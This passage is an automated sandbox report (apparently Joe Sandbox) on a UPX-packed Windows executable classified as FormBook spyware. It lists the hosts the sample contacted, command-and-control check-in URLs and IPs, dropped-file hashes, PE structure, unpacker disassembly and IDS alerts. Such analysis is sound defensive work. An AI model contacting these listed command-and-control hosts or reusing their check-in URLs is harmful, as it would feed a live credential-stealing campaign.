https://www.hover.com/domains/results | cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://fedoraproject.org/cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csscipher.exe, 00000004.00000002.4527269915.000000000651E000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000039BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3Ncipher.exe, 00000004.00000002.4527269915.0000000006E8A000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000432A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYcipher.exe, 00000004.00000002.4527269915.0000000006B66000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000004006000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.240.81.18 | upshercode.store | United States | 46606 | UNIFIEDLAYER-AS-1US | true
87.236.16.214 | www.novosti-dubai.ru | Russian Federation | 198610 | BEGET-ASRU | true
92.118.24.161 | szandraromanovics.hu | Hungary | 62292 | EZIT-ASHU | true
69.57.162.24 | emgeecontracting.shop | United States | 25653 | FORTRESSITXUS | true
185.253.212.22 | www.brzuszkiewicz.pl | Poland | 48707 | GREENER-ASPL | true
5.101.153.149 | www.dvizhenie-pallet.ru | Russian Federation | 198610 | BEGET-ASRU | true
203.161.43.228 | www.anoldshow.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
188.114.96.3 | www.ilodezu.com | European Union | 13335 | CLOUDFLARENETUS | true
194.58.112.174 | www.kubanci.ru | Russian Federation | 197695 | AS-REGRU | true
212.227.172.253 | www.fruitique.co.uk | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
3.33.130.190 | darkerberrycoffee.com | United States | 8987 | AMAZONEXPANSIONGB | true
216.40.34.41 | www.botcsllc.com | Canada | 15348 | TUCOWSCA | true
104.21.28.203 | www.featurasandals.com | United States | 13335 | CLOUDFLARENETUS | true
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1446508
                                  Start date and time:2024-05-23 15:17:35 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 0s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:2
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:PI No 20000814C.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@16/13
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:
                                  • Successful, ratio: 92%
                                  • Number of executed functions: 61
                                  • Number of non-executed functions: 273
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
09:19:13 | API Interceptor | 11902577x Sleep call for process: cipher.exe modified
                                  Process:C:\Windows\SysWOW64\cipher.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                  Category:dropped
                                  Size (bytes):196608
                                  Entropy (8bit):1.1239949490932863
                                  Encrypted:false
                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                  MD5:271D5F995996735B01672CF227C81C17
                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Process:C:\Users\user\Desktop\PI No 20000814C.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270336
                                  Entropy (8bit):7.994419475076061
                                  Encrypted:true
                                  SSDEEP:6144:g6+wCRAoON1UzGt87l3ba5neMDi2K6TxNP0D1/:uRKN+vp3boRDK6jP+
                                  MD5:5298C2458262C59836913293DBBBB041
                                  SHA1:A9F3E5F597040E3DD1C281E08453EA7733603E69
                                  SHA-256:28F19E69128F8780C9ABEE8CF7C53AB7D5698E3B53905C281C751633C2570861
                                  SHA-512:0560BC83127199631788FA96FA6B7D7C595BB488E02EA454F471DC3DA0418962B612852236763EDB916D8BB51185DCCEBB27A88865E67894B2FE86CAC06AB21C
                                  Malicious:false
                                  Reputation:low
                                  Process:C:\Users\user\Desktop\PI No 20000814C.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):9934
                                  Entropy (8bit):7.599258598709732
                                  Encrypted:false
                                  SSDEEP:192:eyaFcTokleYnNrFyF7d8ionhQ0qu+UoPrUkU5lfm0D8Wj:AFxkleYnnyF7C1hQPu+UoPFU5lfm4p
                                  MD5:33D46AAEE431E40D0B63C5371840526F
                                  SHA1:6B9106101FB7416A230E015C5C2728D3D797DFF3
                                  SHA-256:02614F6BF8D2B442EB87273F1FB57ED72CF594BD2DF630B85ABB9B37ECA79746
                                  SHA-512:A777D417497AAA7CE33477CABDA4C09D66D9BAB00AA9066B13734305C50F538EF3F8AC6A86A696040BC4869B102D71ED8084A8AAAD9DE52D0C01634CAAFAED96
                                  Malicious:false
                                  Reputation:low
                                  Process:C:\Users\user\Desktop\PI No 20000814C.exe
                                  File Type:ASCII text, with very long lines (29748), with no line terminators
                                  Category:dropped
                                  Size (bytes):29748
                                  Entropy (8bit):3.5516531405972858
                                  Encrypted:false
                                  SSDEEP:768:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNb2E+Ip6Cr4vfF3if6gyD:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RA
                                  MD5:CCA43592804E428B8EDD9840CD4C85AC
                                  SHA1:6DB2004BD8A80813EDD63439A3D6C80F52F30FC4
                                  SHA-256:6AB85AAAA5084D9AAFD244295B8222F9C1E8A533E08AA46AE23D9BB0CEBD86FB
                                  SHA-512:1E11E0C4E8E75BDA07EBF8A71EF80042FFF4EFA98251E9934954BD8C1BCB91AAFB830BE1BF10CF71C0611BD6D4400E176D61834789143BE1F20EA2795CCB4C90
                                  Malicious:false
                                  Reputation:low
                                  Process:C:\Users\user\Desktop\PI No 20000814C.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270336
                                  Entropy (8bit):7.994419475076061
                                  Encrypted:true
                                  SSDEEP:6144:g6+wCRAoON1UzGt87l3ba5neMDi2K6TxNP0D1/:uRKN+vp3boRDK6jP+
                                  MD5:5298C2458262C59836913293DBBBB041
                                  SHA1:A9F3E5F597040E3DD1C281E08453EA7733603E69
                                  SHA-256:28F19E69128F8780C9ABEE8CF7C53AB7D5698E3B53905C281C751633C2570861
                                  SHA-512:0560BC83127199631788FA96FA6B7D7C595BB488E02EA454F471DC3DA0418962B612852236763EDB916D8BB51185DCCEBB27A88865E67894B2FE86CAC06AB21C
                                  Malicious:false
                                  Reputation:low
                                  Preview:z....I0NA..]....G1...f@8...AQKMTLNUI9AG297RNC0I0NAQKMTLNU.9AG<&.\N.9...@..l.$'&iI3(UKV?n Q'^!5q)(t>;;iP/gvvdr#,T,.CL[oMTLNUI98F;..2)..)W.|1,.N..sY&.(...r#W.*..w-3..<*Q|'U.7RNC0I0N..KM.MOU.{.297RNC0I.NCP@L_LN[M9AG297RNC.\0NAAKMTlJUI9.G2)7RNA0I6NAQKMTLHUI9AG297rJC0K0NAQKMVL..I9QG2)7RNC I0^AQKMTL^UI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTL`!,A5G29._JC0Y0NA_OMT\NUI9AG297RNC0I.NA1KMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQ
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.946112183475076
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:PI No 20000814C.exe
                                  File size:691'200 bytes
                                  MD5:fddc263879fbf539b746d116e8429a7f
                                  SHA1:d83296177c8f166a95cafbd12ac1ae327ded42c7
                                  SHA256:6803a04a376df6f873fe53b3b79bf12534b8c1b74d037a01f537e74bac994f88
                                  SHA512:99b8c182f7afdc3912e567e5f408a6255fcc2c30361f84d51f2f315629d3adaf96225e819b6a9358957ea994b69e1d878b956afe0c27a8abc3041944e0041ed8
                                  SSDEEP:12288:aYV6MorX7qzuC3QHO9FQVHPF51jgcxL/wgbggD+En6onCvJzgngsU:JBXu9HGaVHh/wgbv6okJQNU
                                  TLSH:BDE423C12A86DC6BC45813BDC83F8D606441B8B1CFD03B6E8695F15FB5AA783D43785A
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x52b090
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x664EA1CE [Thu May 23 01:54:22 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fc6683d30d9f25244a50fd5357825e79
                                  Instruction
                                  pushad
                                  mov esi, 004D5000h
                                  lea edi, dword ptr [esi-000D4000h]
                                  push edi
                                  jmp 00007F46F8D189FDh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189DFh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007F46F8D189FDh
                                  jne 00007F46F8D18A1Ah
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D18A11h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007F46F8D189C6h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007F46F8D18A44h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007F46F8D18A03h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007F46F8D18A67h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007F46F8D189FDh
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189BEh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189B0h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007F46F8D189E1h
                                  jne 00007F46F8D189FBh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007F46F8D189D6h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [edi+ebp]
                                  cmp ebp, FFFFFFFCh
                                  jbe 00007F46F8D18A00h
                                  mov al, byte ptr [edx]
                                  Programming Language:
                                  • [ASM] VS2013 build 21005
                                  • [ C ] VS2013 build 21005
                                  • [C++] VS2013 build 21005
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2013 UPD5 build 40629
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17df28 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12c000 | 0x51f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17e34c | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x12b274 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xd4000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xd5000 | 0x57000 | 0x56400 | c6c4a1700209fe930ad6331503fddca5 | False | 0.9873443161231884 | data | 7.9354788110097765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x12c000 | 0x53000 | 0x52400 | f380fa9147265c22222d3dbc4bb7afc6 | False | 0.9380491308890577 | data | 7.918216833417907 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x12c5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x12c6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x12c804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x12c930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x12cc1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x12cd48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x12dbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x12e4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x12ea0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x130fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x132064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xce4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcea84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xcf110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xcf5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xcfb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xd01f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xd0660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x1324d0 | 0x4b490 | data | | | 1.0003275307424895
RT_GROUP_ICON | 0x17d964 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x17d9e0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x17d9f8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x17da10 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x17da28 | 0x10c | data | English | Great Britain | 0.6007462686567164
RT_MANIFEST | 0x17db38 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/23/24-15:22:06.071714 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49758 | 80 | 192.168.2.6 | 92.118.24.161
05/23/24-15:18:49.680830 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49705 | 80 | 192.168.2.6 | 69.57.162.24
05/23/24-15:21:58.470715 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49755 | 80 | 192.168.2.6 | 92.118.24.161
05/23/24-15:20:45.419534 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.6 | 185.253.212.22
05/23/24-15:19:49.011176 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.6 | 104.21.28.203
05/23/24-15:19:05.833612 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49706 | 80 | 192.168.2.6 | 162.240.81.18
05/23/24-15:20:14.696083 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:19:13.744543 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49709 | 80 | 192.168.2.6 | 162.240.81.18
05/23/24-15:19:19.632073 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49711 | 80 | 192.168.2.6 | 216.40.34.41
05/23/24-15:22:26.119155 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49763 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:19:27.226609 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49714 | 80 | 192.168.2.6 | 216.40.34.41
05/23/24-15:22:20.382287 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49762 | 80 | 192.168.2.6 | 212.227.172.253
05/23/24-15:22:34.789548 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49766 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:22:48.963738 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49768 | 80 | 192.168.2.6 | 162.240.81.18
05/23/24-15:22:29.725643 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49764 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:21:32.767630 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49748 | 80 | 192.168.2.6 | 194.58.112.174
05/23/24-15:20:02.477355 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.6 | 203.161.43.228
05/23/24-15:19:40.382894 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:22:43.353051 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49767 | 80 | 192.168.2.6 | 69.57.162.24
05/23/24-15:19:08.371111 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49707 | 80 | 192.168.2.6 | 162.240.81.18
05/23/24-15:21:47.492356 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49752 | 80 | 192.168.2.6 | 5.101.153.149
05/23/24-15:22:01.008997 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49756 | 80 | 192.168.2.6 | 92.118.24.161
05/23/24-15:21:15.750020 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49743 | 80 | 192.168.2.6 | 188.114.96.3
05/23/24-15:21:30.227166 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.6 | 194.58.112.174
05/23/24-15:21:43.953802 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49751 | 80 | 192.168.2.6 | 5.101.153.149
05/23/24-15:19:22.165946 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.6 | 216.40.34.41
05/23/24-15:20:23.881931 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:20:50.479813 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.6 | 185.253.212.22
05/23/24-15:20:17.233600 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:22:14.369346 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49760 | 80 | 192.168.2.6 | 212.227.172.253
05/23/24-15:21:09.103352 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49742 | 80 | 192.168.2.6 | 87.236.16.214
05/23/24-15:19:46.313193 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49719 | 80 | 192.168.2.6 | 104.21.28.203
05/23/24-15:20:08.950461 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.6 | 203.161.43.228
05/23/24-15:20:37.057490 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:21:01.493554 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.6 | 87.236.16.214
05/23/24-15:21:18.289377 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.6 | 188.114.96.3
05/23/24-15:19:35.307782 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:19:54.075610 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49722 | 80 | 192.168.2.6 | 104.21.28.203
05/23/24-15:20:29.405295 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49731 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:21:04.025678 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.6 | 87.236.16.214
05/23/24-15:20:42.874552 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49735 | 80 | 192.168.2.6 | 185.253.212.22
05/23/24-15:20:31.945274 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.6 | 3.33.130.190
05/23/24-15:19:32.772777 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49715 | 80 | 192.168.2.6 | 3.33.130.190
